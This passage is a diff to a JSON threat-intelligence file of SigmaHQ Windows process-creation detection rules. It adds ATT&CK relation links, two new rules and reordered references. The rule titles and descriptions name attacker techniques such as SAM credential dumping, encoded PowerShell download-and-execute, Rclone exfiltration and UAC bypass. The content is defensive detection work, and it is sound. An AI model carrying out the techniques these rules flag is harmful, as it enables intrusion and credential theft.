"27a72a60-7e5e-47b1-9d17-909c9abafdcd", "value": "Suspicious Compression Tool Parameters" }, @@ -33326,11 +42495,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://twitter.com/JohnLaTwC/status/1223292479270600706", "https://twitter.com/bohops/status/980659399495741441", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" ], "tags": [ @@ -33338,6 +42507,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", "value": "Suspicious Usage of the Manage-bde.wsf Script" }, @@ -33362,9 +42540,52 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "value": "Use of VSIISExeLauncher.exe" }, + { + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "meta": { + "author": "frack113", + "creation_date": "2023/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_double_ext_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_double_ext_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "related": [ + { + "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "value": "Suspicious Double File Extention in ParentCommandLine" + }, { "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { @@ -33378,9 +42599,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://twitter.com/bryon_/status/975835709587075072", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://twitter.com/bryon_/status/975835709587075072", + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" ], "tags": [ @@ -33390,6 +42611,22 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "value": "Detection of PowerShell Execution via Sqlps.exe" }, @@ -33414,6 +42651,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", "value": "Abused Debug Privilege by Arbitrary Parent Processes" }, @@ -33440,6 +42686,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "value": "Invoke-Obfuscation Via Use Clip" }, @@ -33464,6 +42719,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "value": "REGISTER_APP.VBS Proxy Execution" }, @@ -33488,6 +42752,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", "value": "Suspicious Service Binary Directory" }, @@ -33528,8 +42801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" ], "tags": "No established tags" @@ -33559,6 +42832,15 @@ "attack.t1559" ] }, + "related": [ + { + "dest-uuid": "acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", "value": "Trickbot Malware Activity" }, @@ -33575,10 +42857,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" ], "tags": [ @@ -33588,9 +42870,52 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", "value": "Suspicious Csi.exe Usage" }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_script_engine_parent_.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation From Script Engines" + }, { "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", "meta": { @@ -33613,6 +42938,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "value": "Renamed ProcDump Execution" }, @@ -33629,14 +42963,23 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.scythe.io/library/threat-emulation-qakbot", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.scythe.io/library/threat-emulation-qakbot", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" ], "tags": [ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "value": "LOLBIN From Abnormal Drive" }, @@ -33662,6 +43005,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "value": "Use of Pcalua For Execution" }, @@ -33678,8 +43030,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" ], @@ -33689,11 +43041,20 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", "value": "NirCmd Tool Execution" }, { - "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", "meta": { "author": "Florian Roth", "creation_date": "2022/03/24", @@ -33713,6 +43074,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "value": "PowerShell Web Download and Execution" }, @@ -33729,8 +43099,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" ], "tags": [ @@ -33754,10 +43124,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/hFireF0X/status/897640081053364225", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://twitter.com/hFireF0X/status/897640081053364225", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" ], "tags": [ @@ -33770,6 +43140,22 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "value": "CMSTP UAC Bypass via COM Object Access" }, @@ -33811,8 +43197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/x86matthew/status/1505476263464607744?s=12", "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], "tags": "No established tags" @@ -33845,6 +43231,29 @@ "attack.s0106" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", "value": "CrackMapExec Command Execution" }, @@ -33862,9 +43271,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ @@ -33889,10 +43298,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", - "https://github.com/Neo23x0/DLLRunner", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://github.com/Neo23x0/DLLRunner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" ], "tags": [ @@ -33900,6 +43309,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", "value": "Suspicious Call by Ordinal" }, @@ -33924,6 +43342,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", "value": "Empire Monkey" }, @@ -33950,6 +43377,15 @@ "car.2013-05-009" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", "value": "Ps.exe Renamed SysInternals Tool" }, @@ -33974,6 +43410,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", "value": "Kavremover Dropped Binary LOLBIN Usage" }, @@ -34000,6 +43445,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "value": "Suspicious Msiexec Load DLL" }, @@ -34026,6 +43480,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "value": "Suspicious Runscripthelper.exe" }, @@ -34050,6 +43520,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "value": "CL_Mutexverifiers.ps1 Proxy Execution" }, @@ -34075,6 +43554,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "90d50722-0483-4065-8e35-57efaadd354d", "value": "DevInit Lolbin Download" }, @@ -34091,8 +43579,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" ], "tags": [ @@ -34116,8 +43604,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/j0nh4t/status/1429049506021138437", "https://streamable.com/q2dsji", + "https://twitter.com/j0nh4t/status/1429049506021138437", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" ], "tags": [ @@ -34125,6 +43613,15 @@ "attack.t1553" ] }, + "related": [ + { + "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", "value": "Suspicious RazerInstaller Explorer Subprocess" }, @@ -34148,6 +43645,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", "value": "Encoded IEX" }, @@ -34165,8 +43671,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml" ], "tags": [ @@ -34197,6 +43703,15 @@ "attack.t1119" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", "value": "Recon Information for Export with Command Prompt" }, @@ -34223,6 +43738,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", "value": "APT29" }, @@ -34275,6 +43799,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", "value": "Registry Dump of SAM Creds and Secrets" }, @@ -34370,8 +43903,8 @@ "refs": [ "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://twitter.com/0gtweet/status/1583356502340870144", + "https://lolbas-project.github.io/lolbas/Binaries/Setres/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" ], "tags": [ @@ -34380,6 +43913,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "value": "Use of Setres.exe" }, @@ -34396,10 +43945,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" ], @@ -34408,6 +43957,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "value": "Rclone Execution via Command Line or PowerShell" }, @@ -34424,9 +43982,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" ], "tags": [ @@ -34434,6 +43992,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "value": "Copy from Volume Shadow Copy" }, @@ -34450,9 +44017,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/c_APT_ure/status/939475433711722497", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://twitter.com/haroonmeer/status/939099379834658817", - "https://twitter.com/c_APT_ure/status/939475433711722497", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" ], "tags": [ @@ -34511,6 +44078,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", "value": "WScript or CScript Dropper" }, @@ -34535,6 +44118,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "value": "Sideloading Link.EXE" }, @@ -34559,6 +44151,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "value": "Suspicious Script Execution From Temp Folder" }, @@ -34585,6 +44186,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", "value": "FromBase64String Command Line" }, @@ -34609,6 +44226,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "value": "Use of Anydesk Remote Access Software from Suspicious Folder" }, @@ -34634,6 +44260,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6355a919-2e97-4285-a673-74645566340d", "value": "RdrLeakDiag Process Dump" }, @@ -34662,6 +44297,15 @@ "car.2014-04-003" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "value": "MSHTA Spawning Windows Shell" }, @@ -34686,6 +44330,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b046706-5789-4673-b111-66f25fe99534", "value": "Overwrite Deleted Data with Cipher" }, @@ -34727,8 +44380,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], "tags": "No established tags" @@ -34749,8 +44402,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" ], "tags": [ @@ -34781,6 +44434,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", "value": "UNC2452 Process Creation Patterns" }, @@ -34797,8 +44459,8 @@ 